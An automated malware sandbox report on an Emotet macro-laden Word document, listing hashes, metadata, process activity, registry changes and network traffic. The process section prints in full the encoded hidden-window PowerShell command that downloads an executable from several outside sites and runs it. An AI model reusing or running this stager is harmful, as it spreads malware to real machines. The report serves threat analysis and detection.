File name:

qq.docx

Full analysis: https://app.any.run/tasks/5e3ac76e-375b-4d06-bd69-42971f6a3774
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 02, 2025, 14:27:54
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
generated-doc
emotet-doc
emotet
macros
macros-on-open
susp-powershell
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Et facere qui., Author: Nancy Ranftl, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 19 22:01:00 2019, Last Saved Time/Date: Tue Nov 19 22:01:00 2019, Number of Pages: 1, Number of Words: 19, Number of Characters: 113, Security: 0
MD5:

344623480A742224558B38F5619A4614

SHA1:

9E94806D910922EB0E6EB833A6591116DADD825D

SHA256:

95D144A3F878347C96562AF564FA54BBA59E451845AEC4EC328B342564917E4C

SSDEEP:

3072:X0ySV/H+UaqFh5Jr/SzFaSadGBrjC48+WZ/POhh+/k2PUcPj9oJx:X0ySV/HNaqDSzGdD48+aPOnt2PUuor

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7904)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7904)
    • Drops known malicious document

      • WINWORD.EXE (PID: 2152)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 7904)
    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 2152)
  • INFO

    • An automatically generated document

      • WINWORD.EXE (PID: 2152)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7904)
    • Disables trace logs

      • powershell.exe (PID: 7904)
    • Reads mouse settings

      • WINWORD.EXE (PID: 2152)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7904)
    • Reads security settings of Internet Explorer

      • splwow64.exe (PID: 7548)
    • Checks proxy server information

      • powershell.exe (PID: 7904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: Et facere qui.
Subject: -
Author: Nancy Ranftl
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2019:11:19 22:01:00
ModifyDate: 2019:11:19 22:01:00
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
ContentStatus: -
CharCountWithSpaces: 131
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 19
Characters: 113
Pages: 1
Paragraphs: 1
Lines: 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
136
Monitored processes
8
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe splwow64.exe no specs sppextcomobj.exe no specs slui.exe no specs powershell.exe conhost.exe no specs ai.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2152"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Desktop\qq.docx.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\vfs\system\fm20.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll
c:\windows\system32\wintrust.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbe7intl.dll
c:\program files\microsoft office\root\vfs\system\fm20enu.dll
c:\windows\system32\windows.globalization.dll
c:\windows\system32\bcp47langs.dll
c:\windows\system32\bcp47mrm.dll
c:\windows\system32\globinputhost.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeuires.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
7180"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "42037E6E-74DF-443B-A26D-AF6D5E26F852" "24A3CF01-DD32-437C-BB23-F9C7891B8856" "2152"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
7548C:\WINDOWS\splwow64.exe 8192C:\Windows\splwow64.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Print driver host for applications
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sspicli.dll
c:\windows\system32\driverstore\filerepository\prnms003.inf_amd64_cd3a96bdb38c8f0d\amd64\printconfig.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\version.dll
c:\windows\system32\prntvpt.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\urlmon.dll
7624C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7664"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7904powershell -w hidden -enco JABOAHcAegB1AHoAYgBuAGoAPQAnAEQAegBzAHgAZwB6AGIAbQBsAGQAdAAnADsAJABPAHIAdQBrAG8AYgBwAGMAcgBhAHkAIAA9ACAAJwA4ADcAMgAnADsAJABBAHYAdQBwAHQAdwBlAHQAagB4AD0AJwBYAHkAbwBwAHkAZgBzAGMAcQAnADsAJABFAHYAbgBmAHIAcQBhAHAAYgB3AHQAbwByAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAHIAdQBrAG8AYgBwAGMAcgBhAHkAKwAnAC4AZQB4AGUAJwA7ACQARABqAGMAcQBvAG0AZABqAHEAbABtAHQAPQAnAFkAcQB6AGsAawBwAHYAdgBiACcAOwAkAE8AdwB4AG0AYQBiAHcAbAB5AD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcARQBCAEMAbABpAGUATgB0ADsAJABGAGkAeAByAGUAagB1AHYAcQA9ACcAaAB0AHQAcAA6AC8ALwBkAHMALQBzAHQAbwBuAGUAcgBvAG8AdABzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AYwBiADcAMgAyADUAMwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbwBrAGEAeQBsAGEAdABlAHMAdAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADUAMgB4AGMAbgBxADMAOAAwADMAOAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwBoAGUAbABwAGUAcgAuAGMAbwBtAC8AYwBvAG0AbQAvAG0AbwBuAGUAeQBtAGEAawBlAHIAcwAvAGMAcwBzAC8AbQA1ADMALwAqAGgAdAB0AHAAcwA6AC8ALwBzAHQAbwByAGUALgBhAGMAYQAtAGEAcABhAGMALgBjAG8AbQAvAHAAaABwAG0AeQBhAGQAbQBpAG4ALwA3AHoAagBqAGUAaAAzADcANgAzADUAMQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHEAdQBhAG4AdAB1AG0AcwAuAHQAZQBjAGgAbgBvAGwAbwBnAHkALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADYAMABkADAAYwByAG0AMgAvACcALgAiAHMAcABgAGwAaQBUACIAKAAnACoAJwApADsAJABYAHYAZQBvAGQAaQB2AHEAPQAnAEcAcQBnAHEAZwBnAG8AbABzAGsAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQASAB2AHUAYQBkAHAAaQBsAGIAaABsACAAaQBuACAAJABGAGkAeAByAGUAagB1AHYAcQApAHsAdAByAHkAewAkAE8AdwB4AG0AYQBiAHcAbAB5AC4AIgBEAG8AdwBOAEwATwBgAEEAZABmAEkAYABsAEUAIgAoACQASAB2AHUAYQBkAHAAaQBsAGIAaABsACwAIAAkAEUAdgBuAGYAcgBxAGEAcABiAHcAdABvAHIAKQA7ACQAQQBvAHQAcgBnAHYAYQBoAGgAYQA9ACcAUgB5AHUAbQBkAHEAZABlAHAAcwB6ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQARQB2AG4AZgByAHEAYQBwAGIAdwB0AG8AcgApAC4AIgBMAGAARQBOAGcAVABIACIAIAAtAGcAZQAgADMANAA2ADQAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAHIAdAAiACgAJABFAHYAbgBmAHIAcQBhAHAAYgB3AHQAbwByACkAOwAkAEkAZwBqAGkAcgB4AG4AbQA9ACcASwBxAHAAdQB6AGoAeQBxAHMAYQBwAGgAdQAnADsAYgByAGUAYQBrADsAJABUAGIAZgBzAGkAcABhAHgAZABtAHQAPQAnAEkAcQBjAGUAdQB1AGMAbgBiAGoAZgBnAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVABuAGIAbQBrAHQAeAB2AD0AJwBXAGsAagBzAG0AaABnAGwAegBpAGMAeAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7912\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 868
Read events
14 735
Write events
119
Delete events
14

Modification events

(PID) Process:(7548) splwow64.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
48CF100000000000
(PID) Process:(2152) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\VBA\Forms3\Controls
Operation:writeName:EnableActiveXControlArchitetureIndependent
Value:
0
(PID) Process:(2152) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\VBA\Forms3\Controls
Operation:writeName:EnableActiveXControlMSWebBrowserArchiteturePersistenceIssue
Value:
0
(PID) Process:(2152) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\10D777
Operation:writeName:10D777
Value:
04000000680800002200000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00710071002E0064006F00630078002E0064006F0063000B000000710071002E0064006F00630078002E0064006F0063000000000001000000000000000A387E676EBBDB0177D7100077D71000000000001F050000000000000000000000000000000000000000000000000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000
(PID) Process:(2152) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Fonts
Operation:writeName:CloudFontsVersion
Value:
4
(PID) Process:(2152) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:delete valueName:em:
Value:
浥:ࡨ
(PID) Process:(2152) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\2152
Operation:writeName:0
Value:
0B0E10D18EC51190C7ED458C197156D3CA851B230046F99C82CFE6EDEEED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC9062E224A676D417147624F622B2F6D76395331316F45762B38616E474A6F2F53514C304D714A7A676741687271633D22CA0D2201A201C20701C2190000C50E8908C91003783634C511E810D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(2152) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:writeName:8v:
Value:
38763A0068080000020000000000000069D037706EBBDB01B200000001000000740000003200000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C0072006F006F0074005C006F0066006600690063006500310036005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
(PID) Process:(2152) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:delete valueName:8v:
Value:
瘸:ࡨ
(PID) Process:(2152) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\2152
Operation:writeName:0
Value:
0B0E10D18EC51190C7ED458C197156D3CA851B230046F99C82CFE6EDEEED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC9062E224A676D417147624F622B2F6D76395331316F45762B38616E474A6F2F53514C304D714A7A676741687271633D22CA0D2201A200C20701C2190000C50E8908C91003783634C511E810D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
Executable files
34
Suspicious files
138
Text files
18
Unknown types
1

Dropped files

PID
Process
Filename
Type
2152WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:6099201513EAE750098D992002C2D06B
SHA256:ADB498540D7F3E94B340EC97E1C9CB34E730533ED34F6D0BBC1EA6A08939AD92
2152WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9binary
MD5:7B91B6538E036CD1430B9E747C2EB87C
SHA256:68C0CCDB6988DCDDD1B9FD9A856D63A46B966BFC4D882407CE259C9A26C2AE97
2152WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:2E07BFA82FFA0B42D5ADC91B85AD879A
SHA256:FD753D1536091E72F2C52A4D47A5D00E4F932142A96DE4A126F87B21025C18D4
2152WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
2152WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:37D456315F2381BD21AE41F8379482B1
SHA256:542B7F419CD8504B88F13EA208743382280EEC2E77D903AEFBD4648B88B6D08B
2152WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9binary
MD5:E820BF284E227D11CED3B1C4D2F76CB5
SHA256:24369375BE6AA3F8684FDD48CE491295A5E7DCB50D42E6BA5325B2452CF45E55
2152WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:85B4A74B6CECF99EFDA3AD7BFABC238B
SHA256:052B04FB9F41D25EE230CD8032BC8D2018AA1BF47F179C9BD7AB1C961513E562
2152WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8A6D5BC8.wmfbinary
MD5:B9C8390D824A677CECBFDE5722AC9E24
SHA256:7267A88ADA24FA02AC7FCED32A6722C67980EBE7D8F5B937F65E9B457E11E0EC
2152WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\qq.docx.doc.LNKbinary
MD5:104DEBD5E7CAC07E611C7B71687FE8AA
SHA256:8CA2FD858385E64BE907C14C9A5A2962C816C00B7F587461D549DD3B356EFB17
2152WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:ED4AD06DE649D526E57603D4DF0F0808
SHA256:0A7CE89AD7D61D9476C6954D9A5D3767AB5EBA2EA48328A7C2799CAE54C7A755
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
56
DNS requests
30
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.164.18:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7904
powershell.exe
GET
200
13.248.169.48:80
http://wwwhelper.com/comm/moneymakers/css/m53/
unknown
unknown
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
5072
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5072
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2152
WINWORD.EXE
GET
200
23.216.77.36:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
whitelisted
2152
WINWORD.EXE
GET
200
23.216.77.36:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
192.168.100.255:138
whitelisted
2.16.164.18:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
23.219.150.101:80
www.microsoft.com
AKAMAI-AS
CL
whitelisted
52.109.32.97:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
52.123.129.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
52.109.28.47:443
roaming.officeapps.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2.19.11.102:443
omex.cdn.office.net
Elisa Oyj
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 2.16.164.18
  • 2.16.164.9
  • 2.16.164.120
  • 2.16.164.106
  • 2.16.164.32
  • 2.16.164.24
  • 23.216.77.36
  • 23.216.77.26
  • 23.216.77.28
  • 23.216.77.32
  • 23.216.77.35
  • 23.216.77.27
  • 23.216.77.33
  • 23.216.77.34
  • 23.216.77.30
whitelisted
google.com
  • 142.250.185.142
whitelisted
www.microsoft.com
  • 23.219.150.101
  • 184.30.21.171
whitelisted
officeclient.microsoft.com
  • 52.109.32.97
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
ecs.office.com
  • 52.123.129.14
  • 52.123.128.14
whitelisted
roaming.officeapps.live.com
  • 52.109.28.47
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
omex.cdn.office.net
  • 2.19.11.102
  • 2.19.11.103
whitelisted

Threats

No threats detected
No debug info